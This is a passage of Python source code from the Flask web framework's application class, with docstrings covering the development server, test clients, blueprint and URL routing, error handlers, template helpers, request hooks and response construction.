Instead, see :ref:`deployment` for WSGI server recommendations.
If the :attr:`debug` flag is set the server will automatically reload
for code changes and show a debugger in case an exception happened.
If you want to run the application in debug mode, but disable the
code execution on the interactive debugger, you can pass
``use_evalex=False`` as parameter. This will keep the debugger's
traceback screen active, but disable code execution.
It is not recommended to use this function for development with
automatic reloading as this is badly supported. Instead you should
be using the :command:`flask` command line script's ``run`` support.
.. admonition:: Keep in Mind
Flask will suppress any server error with a generic error page
unless it is in debug mode. As such to enable just the
interactive debugger without the code reloading, you have to
invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``.
Setting ``use_debugger`` to ``True`` without being in debug mode
won't catch any exceptions because there won't be any to
catch.
:param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to
have the server available externally as well. Defaults to
``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable
if present.
:param port: the port of the webserver. Defaults to ``5000`` or the
port defined in the ``SERVER_NAME`` config variable if present.
:param debug: if given, enable or disable debug mode. See
:attr:`debug`.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param options: the options to be forwarded to the underlying Werkzeug
server. See :func:`werkzeug.serving.run_simple` for more
information.
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment
variables from :file:`.env` and :file:`.flaskenv` files.
If set, the :envvar:`FLASK_ENV` and :envvar:`FLASK_DEBUG`
environment variables will override :attr:`env` and
:attr:`debug`.
Threaded mode is enabled by default.
.. versionchanged:: 0.10
The default port is now picked from the ``SERVER_NAME``
variable.
"""
# Change this into a no-op if the server is invoked from the
# command line. Have a look at cli.py for more information.
if os.environ.get('FLASK_RUN_FROM_CLI') == 'true':
from .debughelpers import explain_ignored_app_run
explain_ignored_app_run()
return
if get_load_dotenv(load_dotenv):
cli.load_dotenv()
# if set, let env vars override previous values
if 'FLASK_ENV' in os.environ:
self.env = get_env()
self.debug = get_debug_flag()
elif 'FLASK_DEBUG' in os.environ:
self.debug = get_debug_flag()
# debug passed to method overrides all other sources
if debug is not None:
self.debug = bool(debug)
_host = '127.0.0.1'
_port = 5000
server_name = self.config.get('SERVER_NAME')
sn_host, sn_port = None, None
if server_name:
sn_host, _, sn_port = server_name.partition(':')
host = host or sn_host or _host
port = int(port or sn_port or _port)
options.setdefault('use_reloader', self.debug)
options.setdefault('use_debugger', self.debug)
options.setdefault('threaded', True)
cli.show_server_banner(self.env, self.debug, self.name, False)
from werkzeug.serving import run_simple
try:
run_simple(host, port, self, **options)
finally:
# reset the first request information if the development server
# reset normally. This makes it possible to restart the server
# without reloader and that stuff from an interactive shell.
self._got_first_request = False
def test_client(self, use_cookies=True, **kwargs):
"""Creates a test client for this application. For information
about unit testing head over to :ref:`testing`.
Note that if you are testing for assertions or exceptions in your
application code, you must set ``app.testing = True`` in order for the
exceptions to propagate to the test client. Otherwise, the exception
will be handled by the application (not visible to the test client) and
the only indication of an AssertionError or other exception will be a
500 status code response to the test client. See the :attr:`testing`
attribute. For example::
app.testing = True
client = app.test_client()
The test client can be used in a ``with`` block to defer the closing down
of the context until the end of the ``with`` block. This is useful if
you want to access the context locals for testing::
with app.test_client() as c:
rv = c.get('/?vodka=42')
assert request.args['vodka'] == '42'
Additionally, you may pass optional keyword arguments that will then
be passed to the application's :attr:`test_client_class` constructor.
For example::
from flask.testing import FlaskClient
class CustomClient(FlaskClient):
def __init__(self, *args, **kwargs):
self._authentication = kwargs.pop("authentication")
                    super(CustomClient, self).__init__(*args, **kwargs)
app.test_client_class = CustomClient
client = app.test_client(authentication='Basic ....')
See :class:`~flask.testing.FlaskClient` for more information.
.. versionchanged:: 0.4
added support for ``with`` block usage for the client.
.. versionadded:: 0.7
The `use_cookies` parameter was added as well as the ability
to override the client to be used by setting the
:attr:`test_client_class` attribute.
.. versionchanged:: 0.11
Added `**kwargs` to support passing additional keyword arguments to
the constructor of :attr:`test_client_class`.
"""
cls = self.test_client_class
if cls is None:
from flask.testing import FlaskClient as cls
return cls(self, self.response_class, use_cookies=use_cookies, **kwargs)
def test_cli_runner(self, **kwargs):
"""Create a CLI runner for testing CLI commands.
See :ref:`testing-cli`.
Returns an instance of :attr:`test_cli_runner_class`, by default
:class:`~flask.testing.FlaskCliRunner`. The Flask app object is
passed as the first argument.
.. versionadded:: 1.0
"""
cls = self.test_cli_runner_class
if cls is None:
from flask.testing import FlaskCliRunner as cls
return cls(self, **kwargs)
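    # Example usage (illustrative, not part of the original source;
    # ``my-command`` is a hypothetical CLI command):
    #
    #     runner = app.test_cli_runner()
    #     result = runner.invoke(args=['my-command'])
    #     assert 'expected output' in result.output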
def open_session(self, request):
"""Creates or opens a new session. Default implementation stores all
session data in a signed cookie. This requires that the
:attr:`secret_key` is set. Instead of overriding this method
we recommend replacing the :class:`session_interface`.
        .. deprecated:: 1.0
Will be removed in 1.1. Use ``session_interface.open_session``
instead.
:param request: an instance of :attr:`request_class`.
"""
warnings.warn(DeprecationWarning(
'"open_session" is deprecated and will be removed in 1.1. Use'
' "session_interface.open_session" instead.'
))
return self.session_interface.open_session(self, request)
def save_session(self, session, response):
"""Saves the session if it needs updates. For the default
implementation, check :meth:`open_session`. Instead of overriding this
method we recommend replacing the :class:`session_interface`.
        .. deprecated:: 1.0
Will be removed in 1.1. Use ``session_interface.save_session``
instead.
:param session: the session to be saved (a
:class:`~werkzeug.contrib.securecookie.SecureCookie`
object)
:param response: an instance of :attr:`response_class`
"""
warnings.warn(DeprecationWarning(
'"save_session" is deprecated and will be removed in 1.1. Use'
' "session_interface.save_session" instead.'
))
return self.session_interface.save_session(self, session, response)
def make_null_session(self):
"""Creates a new instance of a missing session. Instead of overriding
this method we recommend replacing the :class:`session_interface`.
        .. deprecated:: 1.0
Will be removed in 1.1. Use ``session_interface.make_null_session``
instead.
.. versionadded:: 0.7
"""
warnings.warn(DeprecationWarning(
'"make_null_session" is deprecated and will be removed in 1.1. Use'
' "session_interface.make_null_session" instead.'
))
return self.session_interface.make_null_session(self)
@setupmethod
def register_blueprint(self, blueprint, **options):
"""Register a :class:`~flask.Blueprint` on the application. Keyword
arguments passed to this method will override the defaults set on the
blueprint.
Calls the blueprint's :meth:`~flask.Blueprint.register` method after
recording the blueprint in the application's :attr:`blueprints`.
:param blueprint: The blueprint to register.
:param url_prefix: Blueprint routes will be prefixed with this.
:param subdomain: Blueprint routes will match on this subdomain.
:param url_defaults: Blueprint routes will use these default values for
view arguments.
:param options: Additional keyword arguments are passed to
:class:`~flask.blueprints.BlueprintSetupState`. They can be
accessed in :meth:`~flask.Blueprint.record` callbacks.
.. versionadded:: 0.7
"""
first_registration = False
if blueprint.name in self.blueprints:
assert self.blueprints[blueprint.name] is blueprint, (
'A name collision occurred between blueprints %r and %r. Both'
' share the same name "%s". Blueprints that are created on the'
' fly need unique names.' % (
blueprint, self.blueprints[blueprint.name], blueprint.name
)
)
else:
self.blueprints[blueprint.name] = blueprint
self._blueprint_order.append(blueprint)
first_registration = True
blueprint.register(self, options, first_registration)
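    # Example usage (illustrative, not part of the original source;
    # ``yourapplication.simple_page`` is a placeholder module):
    #
    #     from yourapplication.simple_page import simple_page
    #     app.register_blueprint(simple_page, url_prefix='/pages')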
def iter_blueprints(self):
"""Iterates over all blueprints by the order they were registered.
.. versionadded:: 0.11
"""
return iter(self._blueprint_order)
@setupmethod
def add_url_rule(self, rule, endpoint=None, view_func=None,
provide_automatic_options=None, **options):
"""Connects a URL rule. Works exactly like the :meth:`route`
decorator. If a view_func is provided it will be registered with the
endpoint.
Basically this example::
@app.route('/')
def index():
pass
Is equivalent to the following::
def index():
pass
app.add_url_rule('/', 'index', index)
If the view_func is not provided you will need to connect the endpoint
to a view function like so::
app.view_functions['index'] = index
Internally :meth:`route` invokes :meth:`add_url_rule` so if you want
to customize the behavior via subclassing you only need to change
this method.
For more information refer to :ref:`url-route-registrations`.
.. versionchanged:: 0.2
`view_func` parameter added.
.. versionchanged:: 0.6
``OPTIONS`` is added automatically as method.
:param rule: the URL rule as string
:param endpoint: the endpoint for the registered URL rule. Flask
itself assumes the name of the view function as
endpoint
:param view_func: the function to call when serving a request to the
provided endpoint
:param provide_automatic_options: controls whether the ``OPTIONS``
method should be added automatically. This can also be controlled
by setting the ``view_func.provide_automatic_options = False``
before adding the rule.
:param options: the options to be forwarded to the underlying
                        :class:`~werkzeug.routing.Rule` object. A change
                        to Werkzeug is the handling of method options:
                        ``methods`` is a list of methods this rule should be
                        limited to (``GET``, ``POST`` etc.). By default a rule
just listens for ``GET`` (and implicitly ``HEAD``).
Starting with Flask 0.6, ``OPTIONS`` is implicitly
added and handled by the standard request handling.
"""
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func)
options['endpoint'] = endpoint
methods = options.pop('methods', None)
# if the methods are not given and the view_func object knows its
# methods we can use that instead. If neither exists, we go with
# a tuple of only ``GET`` as default.
if methods is None:
methods = getattr(view_func, 'methods', None) or ('GET',)
if isinstance(methods, string_types):
raise TypeError('Allowed methods have to be iterables of strings, '
'for example: @app.route(..., methods=["POST"])')
methods = set(item.upper() for item in methods)
# Methods that should always be added
required_methods = set(getattr(view_func, 'required_methods', ()))
# starting with Flask 0.8 the view_func object can disable and
# force-enable the automatic options handling.
if provide_automatic_options is None:
provide_automatic_options = getattr(view_func,
'provide_automatic_options', None)
if provide_automatic_options is None:
if 'OPTIONS' not in methods:
provide_automatic_options = True
required_methods.add('OPTIONS')
else:
provide_automatic_options = False
# Add the required methods now.
methods |= required_methods
rule = self.url_rule_class(rule, methods=methods, **options)
rule.provide_automatic_options = provide_automatic_options
self.url_map.add(rule)
if view_func is not None:
old_func = self.view_functions.get(endpoint)
if old_func is not None and old_func != view_func:
raise AssertionError('View function mapping is overwriting an '
'existing endpoint function: %s' % endpoint)
self.view_functions[endpoint] = view_func
def route(self, rule, **options):
"""A decorator that is used to register a view function for a
given URL rule. This does the same thing as :meth:`add_url_rule`
but is intended for decorator usage::
@app.route('/')
def index():
return 'Hello World'
For more information refer to :ref:`url-route-registrations`.
:param rule: the URL rule as string
:param endpoint: the endpoint for the registered URL rule. Flask
itself assumes the name of the view function as
endpoint
:param options: the options to be forwarded to the underlying
                        :class:`~werkzeug.routing.Rule` object. A change
                        to Werkzeug is the handling of method options:
                        ``methods`` is a list of methods this rule should be
                        limited to (``GET``, ``POST`` etc.). By default a rule
just listens for ``GET`` (and implicitly ``HEAD``).
Starting with Flask 0.6, ``OPTIONS`` is implicitly
added and handled by the standard request handling.
"""
def decorator(f):
endpoint = options.pop('endpoint', None)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
@setupmethod
def endpoint(self, endpoint):
"""A decorator to register a function as an endpoint.
Example::
@app.endpoint('example.endpoint')
def example():
return "example"
:param endpoint: the name of the endpoint
"""
def decorator(f):
self.view_functions[endpoint] = f
return f
return decorator
@staticmethod
def _get_exc_class_and_code(exc_class_or_code):
"""Ensure that we register only exceptions as handler keys"""
if isinstance(exc_class_or_code, integer_types):
exc_class = default_exceptions[exc_class_or_code]
else:
exc_class = exc_class_or_code
assert issubclass(exc_class, Exception)
if issubclass(exc_class, HTTPException):
return exc_class, exc_class.code
else:
return exc_class, None
@setupmethod
def errorhandler(self, code_or_exception):
"""Register a function to handle errors by code or exception class.
A decorator that is used to register a function given an
error code. Example::
@app.errorhandler(404)
def page_not_found(error):
return 'This page does not exist', 404
You can also register handlers for arbitrary exceptions::
@app.errorhandler(DatabaseError)
def special_exception_handler(error):
return 'Database connection failed', 500
.. versionadded:: 0.7
Use :meth:`register_error_handler` instead of modifying
:attr:`error_handler_spec` directly, for application wide error
handlers.
.. versionadded:: 0.7
One can now additionally also register custom exception types
that do not necessarily have to be a subclass of the
:class:`~werkzeug.exceptions.HTTPException` class.
:param code_or_exception: the code as integer for the handler, or
an arbitrary exception
"""
def decorator(f):
self._register_error_handler(None, code_or_exception, f)
return f
return decorator
@setupmethod
def register_error_handler(self, code_or_exception, f):
"""Alternative error attach function to the :meth:`errorhandler`
decorator that is more straightforward to use for non decorator
usage.
.. versionadded:: 0.7
"""
self._register_error_handler(None, code_or_exception, f)
@setupmethod
def _register_error_handler(self, key, code_or_exception, f):
"""
:type key: None|str
:type code_or_exception: int|T<=Exception
:type f: callable
"""
if isinstance(code_or_exception, HTTPException): # old broken behavior
raise ValueError(
'Tried to register a handler for an exception instance {0!r}.'
' Handlers can only be registered for exception classes or'
' HTTP error codes.'.format(code_or_exception)
)
try:
exc_class, code = self._get_exc_class_and_code(code_or_exception)
except KeyError:
raise KeyError(
"'{0}' is not a recognized HTTP error code. Use a subclass of"
" HTTPException with that code instead.".format(code_or_exception)
)
handlers = self.error_handler_spec.setdefault(key, {}).setdefault(code, {})
handlers[exc_class] = f
@setupmethod
def template_filter(self, name=None):
"""A decorator that is used to register custom template filter.
You can specify a name for the filter, otherwise the function
name will be used. Example::
@app.template_filter()
def reverse(s):
return s[::-1]
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
def decorator(f):
self.add_template_filter(f, name=name)
return f
return decorator
@setupmethod
def add_template_filter(self, f, name=None):
"""Register a custom template filter. Works exactly like the
:meth:`template_filter` decorator.
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
self.jinja_env.filters[name or f.__name__] = f
@setupmethod
def template_test(self, name=None):
"""A decorator that is used to register custom template test.
You can specify a name for the test, otherwise the function
name will be used. Example::
@app.template_test()
def is_prime(n):
if n == 2:
return True
for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
if n % i == 0:
return False
return True
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
def decorator(f):
self.add_template_test(f, name=name)
return f
return decorator
@setupmethod
def add_template_test(self, f, name=None):
"""Register a custom template test. Works exactly like the
:meth:`template_test` decorator.
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
self.jinja_env.tests[name or f.__name__] = f
@setupmethod
def template_global(self, name=None):
"""A decorator that is used to register a custom template global function.
You can specify a name for the global function, otherwise the function
name will be used. Example::
@app.template_global()
def double(n):
return 2 * n
.. versionadded:: 0.10
:param name: the optional name of the global function, otherwise the
function name will be used.
"""
def decorator(f):
self.add_template_global(f, name=name)
return f
return decorator
@setupmethod
def add_template_global(self, f, name=None):
"""Register a custom template global function. Works exactly like the
:meth:`template_global` decorator.
.. versionadded:: 0.10
:param name: the optional name of the global function, otherwise the
function name will be used.
"""
self.jinja_env.globals[name or f.__name__] = f
@setupmethod
def before_request(self, f):
"""Registers a function to run before each request.
For example, this can be used to open a database connection, or to load
the logged in user from the session.
The function will be called without any arguments. If it returns a
non-None value, the value is handled as if it was the return value from
the view, and further request handling is stopped.
"""
self.before_request_funcs.setdefault(None, []).append(f)
return f
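    # Example usage (illustrative, not part of the original source;
    # ``load_user_from_session`` is a hypothetical helper):
    #
    #     @app.before_request
    #     def load_user():
    #         g.user = load_user_from_session()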
@setupmethod
def before_first_request(self, f):
"""Registers a function to be run before the first request to this
instance of the application.
The function will be called without any arguments and its return
value is ignored.
.. versionadded:: 0.8
"""
self.before_first_request_funcs.append(f)
return f
@setupmethod
def after_request(self, f):
"""Register a function to be run after each request.
Your function must take one parameter, an instance of
:attr:`response_class` and return a new response object or the
same (see :meth:`process_response`).
As of Flask 0.7 this function might not be executed at the end of the
request in case an unhandled exception occurred.
"""
self.after_request_funcs.setdefault(None, []).append(f)
return f
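    # Example usage (illustrative, not part of the original source):
    #
    #     @app.after_request
    #     def set_frame_options(response):
    #         response.headers['X-Frame-Options'] = 'DENY'
    #         return response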
@setupmethod
def teardown_request(self, f):
"""Register a function to be run at the end of each request,
regardless of whether there was an exception or not. These functions
        are executed when the request context is popped, even if an
        actual request was not performed.
Example::
ctx = app.test_request_context()
ctx.push()
...
ctx.pop()
When ``ctx.pop()`` is executed in the above example, the teardown
functions are called just before the request context moves from the
stack of active contexts. This becomes relevant if you are using
such constructs in tests.
        Generally teardown functions must take every necessary step to
        avoid failing. If they do execute code that might fail, they
        will have to surround that code with try/except statements and
        log any errors that occur.
When a teardown function was called because of an exception it will
be passed an error object.
The return values of teardown functions are ignored.
.. admonition:: Debug Note
In debug mode Flask will not tear down a request on an exception
immediately. Instead it will keep it alive so that the interactive
debugger can still access it. This behavior can be controlled
by the ``PRESERVE_CONTEXT_ON_EXCEPTION`` configuration variable.
"""
self.teardown_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def teardown_appcontext(self, f):
"""Registers a function to be called when the application context
ends. These functions are typically also called when the request
context is popped.
Example::
ctx = app.app_context()
ctx.push()
...
ctx.pop()
When ``ctx.pop()`` is executed in the above example, the teardown
functions are called just before the app context moves from the
stack of active contexts. This becomes relevant if you are using
such constructs in tests.
Since a request context typically also manages an application
context it would also be called when you pop a request context.
When a teardown function was called because of an unhandled exception
it will be passed an error object. If an :meth:`errorhandler` is
registered, it will handle the exception and the teardown will not
receive it.
The return values of teardown functions are ignored.
.. versionadded:: 0.9
"""
self.teardown_appcontext_funcs.append(f)
return f
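    # Example usage (illustrative, not part of the original source; assumes
    # a connection was stashed on ``g`` earlier in the request):
    #
    #     @app.teardown_appcontext
    #     def close_db(exc):
    #         db = g.pop('db', None)
    #         if db is not None:
    #             db.close()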
@setupmethod
def context_processor(self, f):
"""Registers a template context processor function."""
self.template_context_processors[None].append(f)
return f
@setupmethod
def shell_context_processor(self, f):
"""Registers a shell context processor function.
.. versionadded:: 0.11
"""
self.shell_context_processors.append(f)
return f
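    # Example usage (illustrative, not part of the original source;
    # ``db`` and ``User`` are placeholder objects):
    #
    #     @app.shell_context_processor
    #     def make_shell_context():
    #         return {'db': db, 'User': User}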
@setupmethod
def url_value_preprocessor(self, f):
"""Register a URL value preprocessor function for all view
functions in the application. These functions will be called before the
:meth:`before_request` functions.
The function can modify the values captured from the matched url before
they are passed to the view. For example, this can be used to pop a
common language code value and place it in ``g`` rather than pass it to
every view.
The function is passed the endpoint name and values dict. The return
value is ignored.
"""
self.url_value_preprocessors.setdefault(None, []).append(f)
return f
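    # Example usage (illustrative, not part of the original source), popping
    # a common language code into ``g`` before it reaches the views:
    #
    #     @app.url_value_preprocessor
    #     def pull_lang_code(endpoint, values):
    #         g.lang_code = values.pop('lang_code', None)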
@setupmethod
def url_defaults(self, f):
"""Callback function for URL defaults for all view functions of the
application. It's called with the endpoint and values and should
update the values passed in place.
"""
self.url_default_functions.setdefault(None, []).append(f)
return f
def _find_error_handler(self, e):
"""Return a registered error handler for an exception in this order:
blueprint handler for a specific code, app handler for a specific code,
blueprint handler for an exception class, app handler for an exception
class, or ``None`` if a suitable handler is not found.
"""
exc_class, code = self._get_exc_class_and_code(type(e))
for name, c in (
(request.blueprint, code), (None, code),
(request.blueprint, None), (None, None)
):
handler_map = self.error_handler_spec.setdefault(name, {}).get(c)
if not handler_map:
continue
for cls in exc_class.__mro__:
handler = handler_map.get(cls)
if handler is not None:
return handler
def handle_http_exception(self, e):
"""Handles an HTTP exception. By default this will invoke the
registered error handlers and fall back to returning the
exception as response.
.. versionchanged:: 1.0.3
``RoutingException``, used internally for actions such as
slash redirects during routing, is not passed to error
handlers.
.. versionchanged:: 1.0
Exceptions are looked up by code *and* by MRO, so
        ``HTTPException`` subclasses can be handled with a catch-all
handler for the base ``HTTPException``.
.. versionadded:: 0.3
"""
# Proxy exceptions don't have error codes. We want to always return
# those unchanged as errors
if e.code is None:
return e
# RoutingExceptions are used internally to trigger routing
# actions, such as slash redirects raising RequestRedirect. They
# are not raised or handled in user code.
if isinstance(e, RoutingException):
return e
handler = self._find_error_handler(e)
if handler is None:
return e
return handler(e)
def trap_http_exception(self, e):
"""Checks if an HTTP exception should be trapped or not. By default
this will return ``False`` for all exceptions except for a bad request
key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It
also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``.
This is called for all HTTP exceptions raised by a view function.
If it returns ``True`` for any exception the error handler for this
exception is not called and it shows up as regular exception in the
traceback. This is helpful for debugging implicitly raised HTTP
exceptions.
.. versionchanged:: 1.0
Bad request errors are not trapped by default in debug mode.
.. versionadded:: 0.8
"""
if self.config['TRAP_HTTP_EXCEPTIONS']:
return True
trap_bad_request = self.config['TRAP_BAD_REQUEST_ERRORS']
# if unset, trap key errors in debug mode
if (
trap_bad_request is None and self.debug
and isinstance(e, BadRequestKeyError)
):
return True
if trap_bad_request:
return isinstance(e, BadRequest)
return False
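    # Example (illustrative, not part of the original source): surface all
    # HTTP exceptions in the interactive debugger instead of handling them:
    #
    #     app.config['TRAP_HTTP_EXCEPTIONS'] = True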
def handle_user_exception(self, e):
"""This method is called whenever an exception occurs that
        should be handled. A special case is
        :class:`~werkzeug.exceptions.HTTPException`, which is forwarded to the
:meth:`handle_http_exception` method. This function will either
return a response value or reraise the exception with the same
traceback.
.. versionchanged:: 1.0
Key errors raised from request data like ``form`` show the
bad key in debug mode rather than a generic bad request
message.
.. versionadded:: 0.7
"""
exc_type, exc_value, tb = sys.exc_info()
assert exc_value is e
# ensure not to trash sys.exc_info() at that point in case someone
# wants the traceback preserved in handle_http_exception. Of course
# we cannot prevent users from trashing it themselves in a custom
# trap_http_exception method so that's their fault then.
if isinstance(e, BadRequestKeyError):
if self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"]:
# Werkzeug < 0.15 doesn't add the KeyError to the 400
# message, add it in manually.
description = e.get_description()
if e.args[0] not in description:
e.description = "KeyError: '{}'".format(*e.args)
else:
# Werkzeug >= 0.15 does add it, remove it in production
e.args = ()
if isinstance(e, HTTPException) and not self.trap_http_exception(e):
return self.handle_http_exception(e)
handler = self._find_error_handler(e)
if handler is None:
reraise(exc_type, exc_value, tb)
return handler(e)
def handle_exception(self, e):
"""Default exception handling that kicks in when an exception
occurs that is not caught. In debug mode the exception will
be re-raised immediately, otherwise it is logged and the handler
for a 500 internal server error is used. If no such handler
exists, a default 500 internal server error message is displayed.
.. versionadded:: 0.3
"""
exc_type, exc_value, tb = sys.exc_info()
got_request_exception.send(self, exception=e)
handler = self._find_error_handler(InternalServerError())
if self.propagate_exceptions:
# if we want to repropagate the exception, we can attempt to
# raise it with the whole traceback in case we can do that
# (the function was actually called from the except part)
# otherwise, we just raise the error again
if exc_value is e:
reraise(exc_type, exc_value, tb)
else:
raise e
self.log_exception((exc_type, exc_value, tb))
if handler is None:
return InternalServerError()
return self.finalize_request(handler(e), from_error_handler=True)
def log_exception(self, exc_info):
"""Logs an exception. This is called by :meth:`handle_exception`
if debugging is disabled and right before the handler is called.
The default implementation logs the exception as error on the
:attr:`logger`.
.. versionadded:: 0.8
"""
self.logger.error('Exception on %s [%s]' % (
request.path,
request.method
), exc_info=exc_info)
def raise_routing_exception(self, request):
"""Exceptions that are recording during routing are reraised with
this method. During debug we are not reraising redirect requests
for non ``GET``, ``HEAD``, or ``OPTIONS`` requests and we're raising
a different error instead to help debug situations.
:internal:
"""
if not self.debug \
or not isinstance(request.routing_exception, RequestRedirect) \
or request.method in ('GET', 'HEAD', 'OPTIONS'):
raise request.routing_exception
from .debughelpers import FormDataRoutingRedirect
raise FormDataRoutingRedirect(request)
def dispatch_request(self):
"""Does the request dispatching. Matches the URL and returns the
return value of the view or error handler. This does not have to
be a response object. In order to convert the return value to a
proper response object, call :func:`make_response`.
.. versionchanged:: 0.7
This no longer does the exception handling, this code was
moved to the new :meth:`full_dispatch_request`.
"""
req = _request_ctx_stack.top.request
if req.routing_exception is not None:
self.raise_routing_exception(req)
rule = req.url_rule
# if we provide automatic options for this URL and the
# request came with the OPTIONS method, reply automatically
if getattr(rule, 'provide_automatic_options', False) \
and req.method == 'OPTIONS':
return self.make_default_options_response()
# otherwise dispatch to the handler for that endpoint
return self.view_functions[rule.endpoint](**req.view_args)
def full_dispatch_request(self):
"""Dispatches the request and on top of that performs request
pre and postprocessing as well as HTTP exception catching and
error handling.
.. versionadded:: 0.7
"""
self.try_trigger_before_first_request_functions()
try:
request_started.send(self)
rv = self.preprocess_request()
if rv is None:
rv = self.dispatch_request()
except Exception as e:
rv = self.handle_user_exception(e)
return self.finalize_request(rv)
def finalize_request(self, rv, from_error_handler=False):
"""Given the return value from a view function this finalizes
the request by converting it into a response and invoking the
postprocessing functions. This is invoked for both normal
request dispatching as well as error handlers.
Because this means that it might be called as a result of a
        failure, a special safe mode is available which can be enabled
with the `from_error_handler` flag. If enabled, failures in
response processing will be logged and otherwise ignored.
:internal:
"""
response = self.make_response(rv)
try:
response = self.process_response(response)
request_finished.send(self, response=response)
except Exception:
if not from_error_handler:
raise
self.logger.exception('Request finalizing failed with an '
'error while handling an error')
return response
def try_trigger_before_first_request_functions(self):
"""Called before each request and will ensure that it triggers
the :attr:`before_first_request_funcs` and only exactly once per
application instance (which means process usually).
:internal:
"""
if self._got_first_request:
return
with self._before_request_lock:
if self._got_first_request:
return
for func in self.before_first_request_funcs:
func()
self._got_first_request = True
def make_default_options_response(self):
"""This method is called to create the default ``OPTIONS`` response.
This can be changed through subclassing to change the default
behavior of ``OPTIONS`` responses.
.. versionadded:: 0.7
"""
adapter = _request_ctx_stack.top.url_adapter
if hasattr(adapter, 'allowed_methods'):
methods = adapter.allowed_methods()
else:
# fallback for Werkzeug < 0.7
methods = []
try:
adapter.match(method='--')
except MethodNotAllowed as e:
methods = e.valid_methods
            except HTTPException:
pass
rv = self.response_class()
rv.allow.update(methods)
return rv
def should_ignore_error(self, error):
"""This is called to figure out if an error should be ignored
or not as far as the teardown system is concerned. If this
function returns ``True`` then the teardown handlers will not be
passed the error.
.. versionadded:: 0.10
"""
return False
def make_response(self, rv):
"""Convert the return value from a view function to an instance of
:attr:`response_class`.
:param rv: the return value from the view function. The view function
must return a response. Returning ``None``, or the view ending
without returning, is not allowed. The following types are allowed
            for ``rv``:
``str`` (``unicode`` in Python 2)
A response object is created with the string encoded to UTF-8
as the body.
``bytes`` (``str`` in Python 2)
A response object is created with the bytes as the body.
``tuple``
Either ``(body, status, headers)``, ``(body, status)``, or
``(body, headers)``, where ``body`` is any of the other types
allowed here, ``status`` is a string or an integer, and
``headers`` is a dictionary or a list of ``(key, value)``
tuples. If ``body`` is a :attr:`response_class` instance,
            ``status`` overwrites the existing value and ``headers`` are
extended.
:attr:`response_class`
The object is returned unchanged.
other :class:`~werkzeug.wrappers.Response` class
The object is coerced to :attr:`response_class`.
:func:`callable`
The function is called as a WSGI application. The result is
used to create a response object.
.. versionchanged:: 0.9
Previously a tuple was interpreted as the arguments for the
response object.
"""
status = headers = None
# unpack tuple returns
if isinstance(rv, tuple):
len_rv = len(rv)
# a 3-tuple is unpacked directly
if len_rv == 3:
rv, status, headers = rv
# decide if a 2-tuple has status or headers
elif len_rv == 2:
if isinstance(rv[1], (Headers, dict, tuple, list)):
rv, headers = rv
else:
rv, status = rv
# other sized tuples are not allowed
else:
raise TypeError(
'The view function did not return a valid response tuple.'
' The tuple must have the form (body, status, headers),'
' (body, status), or (body, headers).'
)
# the body must not be None
if rv is None:
raise TypeError(
'The view function did not return a valid response. The'
' function either returned None or ended without a return'
' statement.'
)
# make sure the body is an instance of the response class
if not isinstance(rv, self.response_class):
if isinstance(rv, (text_type, bytes, bytearray)):
# let the response class set the status and headers instead of
# waiting to do it manually, so that the class can handle any
# special logic
rv = self.response_class(rv, status=status, headers=headers)
status = headers = None
else:
# evaluate a WSGI callable, or coerce a different response
# class to the correct type
try:
rv = self.response_class.force_type(rv, request.environ)
except TypeError as e:
new_error = TypeError(
'{e}\nThe view function did not return a valid'
' response. The return type must be a string, tuple,'
' Response instance, or WSGI callable, but it was a'
' {rv.__class__.__name__}.'.format(e=e, rv=rv)
)
reraise(TypeError, new_error, sys.exc_info()[2])
# prefer the status if it was provided
if status is not None:
if isinstance(status, (text_type, bytes, bytearray)):
rv.status = status
else:
rv.status_code = status
# extend existing headers with provided headers
if headers:
rv.headers.extend(headers)
return rv
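    # Illustrative view return values accepted above (not part of the
    # original source):
    #
    #     return 'hello'                           # str body
    #     return 'created', 201                    # (body, status)
    #     return 'hi', {'X-Foo': 'bar'}            # (body, headers)
    #     return 'hi', 200, [('X-Foo', 'bar')]     # (body, status, headers)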
def create_url_adapter(self, request):
"""Creates a URL adapter for the given request. The URL adapter
is created at a point where the request context is not yet set
up so the request is passed explicitly.
.. versionadded:: 0.6
.. versionchanged:: 0.9
This can now also be called without a request object when the
URL adapter is created for the application context.
.. versionchanged:: 1.0
:data:`SERVER_NAME` no longer implicitly enables subdomain
matching. Use :attr:`subdomain_matching` instead.
"""
if request is not None:
# If subdomain matching is disabled (the default), use the
# default subdomain in all cases. This should be the default
# in Werkzeug but it currently does not have that feature.
subdomain = ((self.url_map.default_subdomain or None)
if not self.subdomain_matching else None)
return self.url_map.bind_to_environ(
request.environ,
server_name=self.config['SERVER_NAME'],
subdomain=subdomain)
# We need at the very least the server name to be set for this
# to work.
if self.config['SERVER_NAME'] is not None:
return self.url_map.bind(
self.config['SERVER_NAME'],
script_name=self.config['APPLICATION_ROOT'],
url_scheme=self.config['PREFERRED_URL_SCHEME'])
def inject_url_defaults(self, endpoint, values):
"""Injects the URL defaults for the given endpoint directly into
the values dictionary passed. This is used internally and
automatically called on URL building.
.. versionadded:: 0.7
"""
funcs = self.url_default_functions.get(None, ())
if '.' in endpoint:
bp = endpoint.rsplit('.', 1)[0]
funcs = chain(funcs, self.url_default_functions.get(bp, ()))
for func in funcs:
func(endpoint, values)
def handle_url_build_error(self, error, endpoint, values):
"""Handle :class:`~werkzeug.routing.BuildError` on :meth:`url_for`.
"""
exc_type, exc_value, tb = sys.exc_info()
for handler in self.url_build_error_handlers:
try:
rv = handler(error, endpoint, values)
if rv is not None:
return rv
except BuildError as e:
# make error available outside except block (py3)
error = e
# At this point we want to reraise the exception. If the error is
# still the same one we can reraise it with the original traceback,
